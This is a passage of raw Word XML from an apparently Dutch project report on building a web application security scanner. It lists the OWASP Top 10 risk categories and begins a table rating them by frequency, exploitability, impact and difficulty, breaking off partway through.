        <w:t xml:space="preserve"> zijn meer gericht op het publiceren van artikelen, onderzoeksrapporten en zoals eerder </w:t>
      </w:r>
      <w:r w:rsidR="003D00E6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252140544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06E0C847" wp14:editId="4971E96E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895836</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="460" name="Rectangle 4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6F06A" id="Rectangle 460" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-70.6pt;width:25pt;height:1031.7pt;z-index:-25117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Wq5s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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005E5297">
        <w:t>vermeld standaarden voor web</w:t>
      </w:r>
      <w:r w:rsidR="003A6253">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="00583F49">
        <w:t xml:space="preserve"> in dit</w:t>
      </w:r>
      <w:r w:rsidR="00DE1933">
        <w:t xml:space="preserve"> document zijn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD13FB" w14:paraId="28C589DD"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EF6456" w14:textId="25FA9E06" w:rsidR="00CD13FB" w:rsidRDefault="00314727">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E90DDD" w14:textId="7C2CBB44" w:rsidR="00CD13FB" w:rsidRDefault="00314727">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD13FB" w:rsidRPr="00422628" w14:paraId="519686FA"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46AE10" w14:textId="7FED4886" w:rsidR="00CD13FB" w:rsidRDefault="00DE1933">
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B90804A" w14:textId="5B54E4EC" w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w:rsidRDefault="00DE1933">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE1933">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Web Application Security Scanner Evaluation Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w14:paraId="5E32036F" w14:textId="77777777" w:rsidTr="008550FD">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>WASC Threat Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="276006FC" w14:textId="7B8A5C51" w:rsidR="00B40D31"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4DE607DC" w14:textId="77777777" w:rsidR="00193B12" w:rsidRDefault="00193B12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC872A5" w14:textId="77777777" w:rsidR="00193B12" w:rsidRDefault="00193B12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E2D0C1" w14:textId="77777777" w:rsidR="00193B12" w:rsidRDefault="00193B12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186F210E" w14:textId="77777777" w:rsidR="00193B12" w:rsidRDefault="00193B12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A53DE9D" w14:textId="77777777" w:rsidR="00193B12" w:rsidRDefault="00193B12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E903224" w14:textId="77777777" w:rsidR="00193B12" w:rsidRPr="00DE1933" w:rsidRDefault="00193B12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618B6CC8" w14:textId="3C707D7D" w:rsidR="003B11B2" w:rsidRDefault="004D5383" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252142592" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36D28B12" wp14:editId="383B8137">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-608156</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="461" name="Rectangle 4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A516F" id="Rectangle 461" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:-47.85pt;width:25pt;height:1031.7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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006A33B8">
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00FC3328">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="003B11B2" w:rsidRPr="00FC3328">
        <w:t>OWASP top 10 lijst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2149AB55" w14:textId="535806E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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE19A9">
        <w:t>A1 Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA1107" w14:textId="53D3FE22" w:rsidR="003B11B2" w:rsidRPr="00E12430" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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39987ECF" w:rsidR="003B11B2" w:rsidRPr="00E12430" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12430">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A3 Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D4C6B" w14:textId="2E1485A5" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE19A9">
        <w:t>A4 Ins</w:t>
      </w:r>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ecure Direct Object References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43495713" w14:textId="59CF985D" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E4233" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A6 Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E979D" w14:textId="6F1B811C" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A7 Missing Function Level Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB29E4" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A8 Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2F116" w14:textId="578B119A" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A9 Using Components with Known Vulnerabilities Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1364F" w14:textId="4B887FAB" w:rsidR="003B11B2" w:rsidRDefault="00A0171A" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A10 Underprotected API’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E2264A" w14:textId="4445906D" w:rsidR="0022176D" w:rsidRPr="0022176D" w:rsidRDefault="0022176D" w:rsidP="0022176D">
      <w:r w:rsidRPr="0022176D">
        <w:t>De definities kun je vinden in de bijlage</w:t>
      </w:r>
      <w:r w:rsidR="00E15DAB">
        <w:t xml:space="preserve"> OWASP top tien</w:t>
      </w:r>
      <w:r w:rsidR="00973148">
        <w:t xml:space="preserve"> (Bijlage</w:t>
      </w:r>
      <w:r w:rsidR="0001685A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0022176D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112525F" w14:textId="4DBE4ACB"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0238F5">
        <w:t xml:space="preserve">Deze </w:t>
      </w:r>
      <w:r w:rsidR="009F7FEA">
        <w:t xml:space="preserve">informatie is cruciaal voor het ontwikkelen van een </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="009F7FEA">
        <w:t xml:space="preserve"> scanner want, het geeft aan op welke risico’s er minimaal gescand moeten worden. Het is net een criteria lijst </w:t>
      </w:r>
      <w:r w:rsidR="002E4BF3">
        <w:t xml:space="preserve">voor een </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00757E90">
        <w:t xml:space="preserve"> scanner. Het zal een</w:t>
      </w:r>
      <w:r w:rsidR="002E4BF3">
        <w:t xml:space="preserve"> moeilijke taak</w:t>
      </w:r>
      <w:r w:rsidR="00757E90">
        <w:t xml:space="preserve"> zijn</w:t>
      </w:r>
      <w:r w:rsidR="002E4BF3">
        <w:t xml:space="preserve"> om binnen de gekregen tijd al deze risico’s te implementeren in de </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="002E4BF3">
        <w:t xml:space="preserve"> scanner.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 xml:space="preserve">Om deze selectie te </w:t>
      </w:r>
      <w:r w:rsidR="00F040F1">
        <w:t xml:space="preserve">kunnen maken zal ik kijken </w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t>hoe vaak een risico</w:t>
      </w:r>
      <w:r w:rsidR="007F0372">
        <w:t xml:space="preserve"> voorkomt</w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t>, hoe makkelijk het exploiteerbaar is, wat de impact is op applicatie niveau en business niveau en wat de moeilijkheidsgraad i</w:t>
      </w:r>
      <w:r w:rsidR="00847276">
        <w:t>s voor het implementeren</w:t>
      </w:r>
      <w:r w:rsidR="00091728">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="00847276">
        <w:t xml:space="preserve">identificeren van de </w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t xml:space="preserve">kwetsbaarheid binnen het </w:t>
      </w:r>
      <w:r w:rsidR="00733C80">
        <w:t>softwaresysteem</w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="703"/>
        <w:gridCol w:w="2029"/>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="1449"/>
        <w:gridCol w:w="1439"/>
        <w:gridCol w:w="1797"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A6DC7" w14:paraId="685392DE"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44BF3C" w14:textId="573D5CC1" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C3ADFA" w14:textId="5F177DDF" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Vaak voorkomend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF63725" w14:textId="0A66FEB2" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Exploiteerbaar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69AE72C9" w14:textId="1B928F66" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64767C08" w14:textId="394BD7EE" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact business</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30813824" w14:textId="4D32EDFC" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>moeilijkheidsgraad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="7C522CDA"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2290F5AD" w14:textId="6A9D554D" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="69364E06" w14:textId="66F60FA8" w:rsidR="001A6DC7" w:rsidRDefault="0001685A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="635C344A" w14:textId="6208A632" w:rsidR="001A6DC7" w:rsidRDefault="0001685A">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634EDB3D" w14:textId="2ACA2EF1" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zeer </w:t>
            </w:r>
            <w:r w:rsidR="0001685A">
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="633DA3A0" w14:textId="41B88434" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zeer </w:t>
            </w:r>
            <w:r w:rsidR="0001685A">
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="4EBB239D" w14:textId="14F78A54" w:rsidR="001A6DC7" w:rsidRDefault="00741CC0">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="19DD8750"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275C2149" w14:textId="63F13C47" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778F99D5" w14:textId="0CD74940" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">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5B0D7D48" w14:textId="425E280B" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F8C2B91" w14:textId="7EFDBA2C" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F702F8C" w14:textId="0E4EC78C" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">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7DDCC77A" w14:textId="12691275" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="48BAF73B"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7FD9465D" w14:textId="74421963" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="629CC26E" w14:textId="735D5E0E" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Heel vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="32DBE2E8" w14:textId="4A3C441F" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">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389CBC2B" w14:textId="08C4DE2E" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
